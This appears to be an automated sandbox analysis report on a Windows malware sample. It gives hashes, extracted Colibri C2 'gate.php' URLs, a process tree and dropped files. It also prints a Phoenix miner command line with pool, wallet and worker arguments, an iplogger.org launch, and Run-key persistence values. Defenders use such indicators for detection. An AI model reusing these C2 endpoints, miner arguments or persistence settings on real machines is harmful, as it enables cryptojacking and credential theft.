Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
03-09-2022 13:00
Static task
static1
Behavioral task
behavioral1
Sample
533a75352e7692b34a28738a67915adf.exe
Resource
win7-20220812-en
General
-
Target
533a75352e7692b34a28738a67915adf.exe
-
Size
602KB
-
MD5
533a75352e7692b34a28738a67915adf
-
SHA1
f58115604020a34ad5a3853c9e91f957fae3021a
-
SHA256
31e2235fd61e64986d698dd1b8cb11c494b05d575886ccfcc437094735401e91
-
SHA512
aff91444a99ca1663ffee7c42060e47bcd830b2acdc7791fb468fa581295c398c97fc7b63e2e38f0c85ae2c61bf831ec70fc3e49b8af5fce56eee33f7e73ba5b
-
SSDEEP
12288:8aHNwhpywQ4NNFNS1I5wWOXfVVIiOsTmddebmxNkV1GWcfAQwPStrWliGYQJo:N/fOLBGYQJ
Malware Config
Extracted
colibri
1.2.0
Build1
http://zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc/gate.php
http://yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx/gate.php
Signatures
-
Detectes Phoenix Miner Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe miner_phoenix C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe miner_phoenix -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
Processes:
conhost.execonhost.exemsedge.exesvchost.exeM704729M6AFBL8F.exetmp2683.tmp.exetmp2683.tmp.exetmp2683.tmp.exeDF71H0IHHEA5CEF.exeGL6J12K6FCE0C62.exetmp3AB7.tmp.exetmp3AB7.tmp.exeIB6E85MCDIIHILD.exeLHD9M712BHMBIC1.exepid process 4084 conhost.exe 4228 conhost.exe 4160 msedge.exe 4448 svchost.exe 4052 M704729M6AFBL8F.exe 5024 tmp2683.tmp.exe 1792 tmp2683.tmp.exe 1508 tmp2683.tmp.exe 2956 DF71H0IHHEA5CEF.exe 4944 GL6J12K6FCE0C62.exe 5004 tmp3AB7.tmp.exe 3304 tmp3AB7.tmp.exe 2256 IB6E85MCDIIHILD.exe 1852 LHD9M712BHMBIC1.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
M704729M6AFBL8F.exeDF71H0IHHEA5CEF.exeIB6E85MCDIIHILD.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation M704729M6AFBL8F.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation DF71H0IHHEA5CEF.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation IB6E85MCDIIHILD.exe -
Loads dropped DLL 3 IoCs
Processes:
rundll32.exerundll32.exepid process 1508 rundll32.exe 60 rundll32.exe 60 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
533a75352e7692b34a28738a67915adf.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run 533a75352e7692b34a28738a67915adf.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSEdge = "C:\\Users\\Admin\\AppData\\Roaming\\MSEdge\\msedge.exe" 533a75352e7692b34a28738a67915adf.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
svchost.exepid process 4448 svchost.exe 4448 svchost.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
conhost.exe533a75352e7692b34a28738a67915adf.exe533a75352e7692b34a28738a67915adf.exetmp2683.tmp.exetmp3AB7.tmp.exedescription pid process target process PID 4084 set thread context of 4228 4084 conhost.exe conhost.exe PID 888 set thread context of 4544 888 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 4544 set thread context of 4764 4544 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 1792 set thread context of 1508 1792 tmp2683.tmp.exe tmp2683.tmp.exe PID 5004 set thread context of 3304 5004 tmp3AB7.tmp.exe tmp3AB7.tmp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4760 4944 WerFault.exe GL6J12K6FCE0C62.exe -
Processes:
LHD9M712BHMBIC1.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch LHD9M712BHMBIC1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" LHD9M712BHMBIC1.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\IESettingSync LHD9M712BHMBIC1.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" LHD9M712BHMBIC1.exe -
Modifies registry class 1 IoCs
Processes:
IB6E85MCDIIHILD.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings IB6E85MCDIIHILD.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
DF71H0IHHEA5CEF.exepid process 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe 2956 DF71H0IHHEA5CEF.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
DF71H0IHHEA5CEF.exeM704729M6AFBL8F.exedescription pid process Token: SeDebugPrivilege 2956 DF71H0IHHEA5CEF.exe Token: SeDebugPrivilege 4052 M704729M6AFBL8F.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
LHD9M712BHMBIC1.exepid process 1852 LHD9M712BHMBIC1.exe 1852 LHD9M712BHMBIC1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
533a75352e7692b34a28738a67915adf.execonhost.exe533a75352e7692b34a28738a67915adf.exe533a75352e7692b34a28738a67915adf.execmd.exemsedge.exeM704729M6AFBL8F.exetmp2683.tmp.exetmp2683.tmp.exeDF71H0IHHEA5CEF.exetmp3AB7.tmp.exedescription pid process target process PID 888 wrote to memory of 4084 888 533a75352e7692b34a28738a67915adf.exe conhost.exe PID 888 wrote to memory of 4084 888 533a75352e7692b34a28738a67915adf.exe conhost.exe PID 888 wrote to memory of 4084 888 533a75352e7692b34a28738a67915adf.exe conhost.exe PID 4084 wrote to memory of 4228 4084 conhost.exe conhost.exe PID 4084 wrote to memory of 4228 4084 conhost.exe conhost.exe PID 4084 wrote to memory of 4228 4084 conhost.exe conhost.exe PID 888 wrote to memory of 4544 888 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 888 wrote to memory of 4544 888 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 888 wrote to memory of 4544 888 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 4084 wrote to memory of 4228 4084 conhost.exe conhost.exe PID 4084 wrote to memory of 4228 4084 conhost.exe conhost.exe PID 4084 wrote to memory of 4228 4084 conhost.exe conhost.exe PID 4084 wrote to memory of 4228 4084 conhost.exe conhost.exe PID 888 wrote to memory of 4544 888 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 888 wrote to memory of 4544 888 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 888 wrote to memory of 4544 888 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 888 wrote to memory of 4544 888 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 888 wrote to memory of 4544 888 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 888 wrote to memory of 4544 888 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 888 wrote to memory of 4544 888 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 4544 wrote to memory of 4764 4544 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 4544 wrote to memory of 4764 4544 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 4544 wrote to memory of 4764 4544 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 4544 wrote to memory of 4764 4544 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 4544 wrote to memory of 4764 4544 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 4544 wrote to memory of 4764 4544 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 4544 wrote to memory of 4764 4544 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 4544 wrote to memory of 4764 4544 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 4544 wrote to memory of 4764 4544 533a75352e7692b34a28738a67915adf.exe 533a75352e7692b34a28738a67915adf.exe PID 4764 wrote to memory of 4104 4764 533a75352e7692b34a28738a67915adf.exe cmd.exe PID 4764 wrote to memory of 4104 4764 533a75352e7692b34a28738a67915adf.exe cmd.exe PID 4764 wrote to memory of 4104 4764 533a75352e7692b34a28738a67915adf.exe cmd.exe PID 4104 wrote to memory of 4160 4104 cmd.exe msedge.exe PID 4104 wrote to memory of 4160 4104 cmd.exe msedge.exe PID 4160 wrote to memory of 4448 4160 msedge.exe svchost.exe PID 4160 wrote to memory of 4448 4160 msedge.exe svchost.exe PID 4764 wrote to memory of 4052 4764 533a75352e7692b34a28738a67915adf.exe M704729M6AFBL8F.exe PID 4764 wrote to memory of 4052 4764 533a75352e7692b34a28738a67915adf.exe M704729M6AFBL8F.exe PID 4052 wrote to memory of 5024 4052 M704729M6AFBL8F.exe tmp2683.tmp.exe PID 4052 wrote to memory of 5024 4052 M704729M6AFBL8F.exe tmp2683.tmp.exe PID 4052 wrote to memory of 5024 4052 M704729M6AFBL8F.exe tmp2683.tmp.exe PID 5024 wrote to memory of 1792 5024 tmp2683.tmp.exe tmp2683.tmp.exe PID 5024 wrote to memory of 1792 5024 tmp2683.tmp.exe tmp2683.tmp.exe PID 5024 wrote to memory of 1792 5024 tmp2683.tmp.exe tmp2683.tmp.exe PID 1792 wrote to memory of 1508 1792 tmp2683.tmp.exe tmp2683.tmp.exe PID 1792 wrote to memory of 1508 1792 tmp2683.tmp.exe tmp2683.tmp.exe PID 1792 wrote to memory of 1508 1792 tmp2683.tmp.exe tmp2683.tmp.exe PID 1792 wrote to memory of 1508 1792 tmp2683.tmp.exe tmp2683.tmp.exe PID 1792 wrote to memory of 1508 1792 tmp2683.tmp.exe tmp2683.tmp.exe PID 1792 wrote to memory of 1508 1792 tmp2683.tmp.exe tmp2683.tmp.exe PID 1792 wrote to memory of 1508 1792 tmp2683.tmp.exe tmp2683.tmp.exe PID 4764 wrote to memory of 2956 4764 533a75352e7692b34a28738a67915adf.exe DF71H0IHHEA5CEF.exe PID 4764 wrote to memory of 2956 4764 533a75352e7692b34a28738a67915adf.exe DF71H0IHHEA5CEF.exe PID 4764 wrote to memory of 4944 4764 533a75352e7692b34a28738a67915adf.exe GL6J12K6FCE0C62.exe PID 4764 wrote to memory of 4944 4764 533a75352e7692b34a28738a67915adf.exe GL6J12K6FCE0C62.exe PID 2956 wrote to memory of 5004 2956 DF71H0IHHEA5CEF.exe tmp3AB7.tmp.exe PID 2956 wrote to memory of 5004 2956 DF71H0IHHEA5CEF.exe tmp3AB7.tmp.exe PID 2956 wrote to memory of 5004 2956 DF71H0IHHEA5CEF.exe tmp3AB7.tmp.exe PID 5004 wrote to memory of 3304 5004 tmp3AB7.tmp.exe tmp3AB7.tmp.exe PID 5004 wrote to memory of 3304 5004 tmp3AB7.tmp.exe tmp3AB7.tmp.exe PID 5004 wrote to memory of 3304 5004 tmp3AB7.tmp.exe tmp3AB7.tmp.exe PID 5004 wrote to memory of 3304 5004 tmp3AB7.tmp.exe tmp3AB7.tmp.exe PID 5004 wrote to memory of 3304 5004 tmp3AB7.tmp.exe tmp3AB7.tmp.exe PID 5004 wrote to memory of 3304 5004 tmp3AB7.tmp.exe tmp3AB7.tmp.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\533a75352e7692b34a28738a67915adf.exe"C:\Users\Admin\AppData\Local\Temp\533a75352e7692b34a28738a67915adf.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\conhost.exe"C:\ProgramData\conhost.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\conhost.exe"C:\ProgramData\conhost.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\533a75352e7692b34a28738a67915adf.exe"C:\Users\Admin\AppData\Local\Temp\533a75352e7692b34a28738a67915adf.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\533a75352e7692b34a28738a67915adf.exe"C:\Users\Admin\AppData\Local\Temp\533a75352e7692b34a28738a67915adf.exe"3⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exeC:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe-pool us-eth.2miners.com:2020 -wal 0x298a98736156cdffdfaf4580afc4966904f1e12e -worker ferma -epsw x -mode 1 -log 0 -mport 0 -etha 0 -ftime 55 -retrydelay 1 -coin eth6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\M704729M6AFBL8F.exe"C:\Users\Admin\AppData\Local\Temp\M704729M6AFBL8F.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\DF71H0IHHEA5CEF.exe"C:\Users\Admin\AppData\Local\Temp\DF71H0IHHEA5CEF.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp3AB7.tmp.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\GL6J12K6FCE0C62.exe"C:\Users\Admin\AppData\Local\Temp\GL6J12K6FCE0C62.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4944 -s 7085⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\IB6E85MCDIIHILD.exe"C:\Users\Admin\AppData\Local\Temp\IB6E85MCDIIHILD.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL",5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL",6⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL",7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL",8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\LHD9M712BHMBIC1.exehttps://iplogger.org/1QsEf74⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 4944 -ip 49441⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\conhost.exeFilesize
75KB
MD5e0a68b98992c1699876f818a22b5b907
SHA1d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA2562b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2
-
C:\ProgramData\conhost.exeFilesize
75KB
MD5e0a68b98992c1699876f818a22b5b907
SHA1d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA2562b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2
-
C:\ProgramData\conhost.exeFilesize
75KB
MD5e0a68b98992c1699876f818a22b5b907
SHA1d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA2562b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2
-
C:\Users\Admin\AppData\Local\Temp\DF71H0IHHEA5CEF.exeFilesize
456KB
MD5ee30741a76c6c35fd4766b2fa48d63be
SHA1db89a94dcd59a7fcae3ff068efc3fa00e8f3abbe
SHA2565d5371581a8a41ad50e0d34e269ebbd17190c0e6b84526374c5455846387107c
SHA512a3d2a5fae1108e5f070638d482f2e67f964b55a72373f0b87542edc0615d140205cc49439f543168e012a3574ae9ec3af2073909aaf90b653e7ff38cb16af975
-
C:\Users\Admin\AppData\Local\Temp\DF71H0IHHEA5CEF.exeFilesize
456KB
MD5ee30741a76c6c35fd4766b2fa48d63be
SHA1db89a94dcd59a7fcae3ff068efc3fa00e8f3abbe
SHA2565d5371581a8a41ad50e0d34e269ebbd17190c0e6b84526374c5455846387107c
SHA512a3d2a5fae1108e5f070638d482f2e67f964b55a72373f0b87542edc0615d140205cc49439f543168e012a3574ae9ec3af2073909aaf90b653e7ff38cb16af975
-
C:\Users\Admin\AppData\Local\Temp\GL6J12K6FCE0C62.exeFilesize
305KB
MD50d52a038018f8bf8cd91dacc4d3307d6
SHA137f37b3e998706ab530c1c9a80cbbfac823d605c
SHA256d664762bc07e033a42f11964f7a086389bd6a8460a6a88f1dc30745b195d2799
SHA51251ca7f2bcbf5b3a3b57ba102342d0f7c23b9cad09a5f00562cca5e285cf83736efc51344c04d5a8580a10e646a23df56222ccdb9d5dc37dfd26608ccc517260b
-
C:\Users\Admin\AppData\Local\Temp\GL6J12K6FCE0C62.exeFilesize
305KB
MD50d52a038018f8bf8cd91dacc4d3307d6
SHA137f37b3e998706ab530c1c9a80cbbfac823d605c
SHA256d664762bc07e033a42f11964f7a086389bd6a8460a6a88f1dc30745b195d2799
SHA51251ca7f2bcbf5b3a3b57ba102342d0f7c23b9cad09a5f00562cca5e285cf83736efc51344c04d5a8580a10e646a23df56222ccdb9d5dc37dfd26608ccc517260b
-
C:\Users\Admin\AppData\Local\Temp\IB6E85MCDIIHILD.exeFilesize
1.2MB
MD52d52952e6bf0bf4c78e0db6ad350cb3c
SHA175cb964419f53cca56a6f0829f7a2bd04c6bd8c8
SHA25626afcf231653a0c74f711b79ddaf53f54dae8a8cfd38858e179f5b8642a4da60
SHA5124ef6dfbe6876dd591e7c2d2ba5defc36d08d5f61f69bd76dd8f1e70b8b8a1a86bf9354fea6dc777eda25b9e1b757d10454348e6918b1e43558f501a690e6dd1a
-
C:\Users\Admin\AppData\Local\Temp\IB6E85MCDIIHILD.exeFilesize
1.2MB
MD52d52952e6bf0bf4c78e0db6ad350cb3c
SHA175cb964419f53cca56a6f0829f7a2bd04c6bd8c8
SHA25626afcf231653a0c74f711b79ddaf53f54dae8a8cfd38858e179f5b8642a4da60
SHA5124ef6dfbe6876dd591e7c2d2ba5defc36d08d5f61f69bd76dd8f1e70b8b8a1a86bf9354fea6dc777eda25b9e1b757d10454348e6918b1e43558f501a690e6dd1a
-
C:\Users\Admin\AppData\Local\Temp\LHD9M712BHMBIC1.exeFilesize
8KB
MD58719ce641e7c777ac1b0eaec7b5fa7c7
SHA1c04de52cb511480cc7d00d67f1d9e17b02d6406b
SHA2566283ac6ecbf4c4038cf44896dd221c7c11152bac77273709330409032c3e72ea
SHA5127be5bd6d2342dd02818f1979e7e74a6376658711ac82a59b2af1a67207cfd3c7416b657af01216473b15132e4aa5c6675f0eb8ee6343192c7dfc4a5249ccaa97
-
C:\Users\Admin\AppData\Local\Temp\LHD9M712BHMBIC1.exeFilesize
8KB
MD58719ce641e7c777ac1b0eaec7b5fa7c7
SHA1c04de52cb511480cc7d00d67f1d9e17b02d6406b
SHA2566283ac6ecbf4c4038cf44896dd221c7c11152bac77273709330409032c3e72ea
SHA5127be5bd6d2342dd02818f1979e7e74a6376658711ac82a59b2af1a67207cfd3c7416b657af01216473b15132e4aa5c6675f0eb8ee6343192c7dfc4a5249ccaa97
-
C:\Users\Admin\AppData\Local\Temp\M704729M6AFBL8F.exeFilesize
487KB
MD58dff0d3f99d12d37b665c9d8a8316a19
SHA1f0bdaf7f749656907bb0861c715c1a818d78fd41
SHA25634cdcd0ccda9ba7a51d1f6aaaa8a2a6d6c64f2fb58627a5f0b94d922be6adce1
SHA5126ce36c92b7d6d52dd77383a9847f1bbf17af11a8a92da90efc8b6f6c1ab2b0985eea5983a553556d5a63e4b86d9b2711b870729557782bd0456e6fe10eb16464
-
C:\Users\Admin\AppData\Local\Temp\M704729M6AFBL8F.exeFilesize
487KB
MD58dff0d3f99d12d37b665c9d8a8316a19
SHA1f0bdaf7f749656907bb0861c715c1a818d78fd41
SHA25634cdcd0ccda9ba7a51d1f6aaaa8a2a6d6c64f2fb58627a5f0b94d922be6adce1
SHA5126ce36c92b7d6d52dd77383a9847f1bbf17af11a8a92da90efc8b6f6c1ab2b0985eea5983a553556d5a63e4b86d9b2711b870729557782bd0456e6fe10eb16464
-
C:\Users\Admin\AppData\Local\Temp\SBJBM.CPLFilesize
1.4MB
MD50d252e0b9151f27dde3c1aafd5bfe86e
SHA1b2987e440920b248907d6d98f17c091250d864ad
SHA2562cee59d85b162709249a6a0f8a9da2bcc5ed0cab570dc82be42f9f3b24a4d70d
SHA512438a87655ea510badf85a1970b9bd18e3fed074dc9de67278ff0652456ade29af7afa773c32551c24cf9aa04d804d716c414fd01d24905f8b5248a5e2d42d36c
-
C:\Users\Admin\AppData\Local\Temp\sBJBM.cplFilesize
1.4MB
MD50d252e0b9151f27dde3c1aafd5bfe86e
SHA1b2987e440920b248907d6d98f17c091250d864ad
SHA2562cee59d85b162709249a6a0f8a9da2bcc5ed0cab570dc82be42f9f3b24a4d70d
SHA512438a87655ea510badf85a1970b9bd18e3fed074dc9de67278ff0652456ade29af7afa773c32551c24cf9aa04d804d716c414fd01d24905f8b5248a5e2d42d36c
-
C:\Users\Admin\AppData\Local\Temp\sBJBM.cplFilesize
1.4MB
MD50d252e0b9151f27dde3c1aafd5bfe86e
SHA1b2987e440920b248907d6d98f17c091250d864ad
SHA2562cee59d85b162709249a6a0f8a9da2bcc5ed0cab570dc82be42f9f3b24a4d70d
SHA512438a87655ea510badf85a1970b9bd18e3fed074dc9de67278ff0652456ade29af7afa773c32551c24cf9aa04d804d716c414fd01d24905f8b5248a5e2d42d36c
-
C:\Users\Admin\AppData\Local\Temp\sBJBM.cplFilesize
1.4MB
MD50d252e0b9151f27dde3c1aafd5bfe86e
SHA1b2987e440920b248907d6d98f17c091250d864ad
SHA2562cee59d85b162709249a6a0f8a9da2bcc5ed0cab570dc82be42f9f3b24a4d70d
SHA512438a87655ea510badf85a1970b9bd18e3fed074dc9de67278ff0652456ade29af7afa773c32551c24cf9aa04d804d716c414fd01d24905f8b5248a5e2d42d36c
-
C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exeFilesize
75KB
MD5e0a68b98992c1699876f818a22b5b907
SHA1d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA2562b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2
-
C:\Users\Admin\AppData\Local\Temp\tmp2683.tmp.exeFilesize
75KB
MD5e0a68b98992c1699876f818a22b5b907
SHA1d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA2562b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
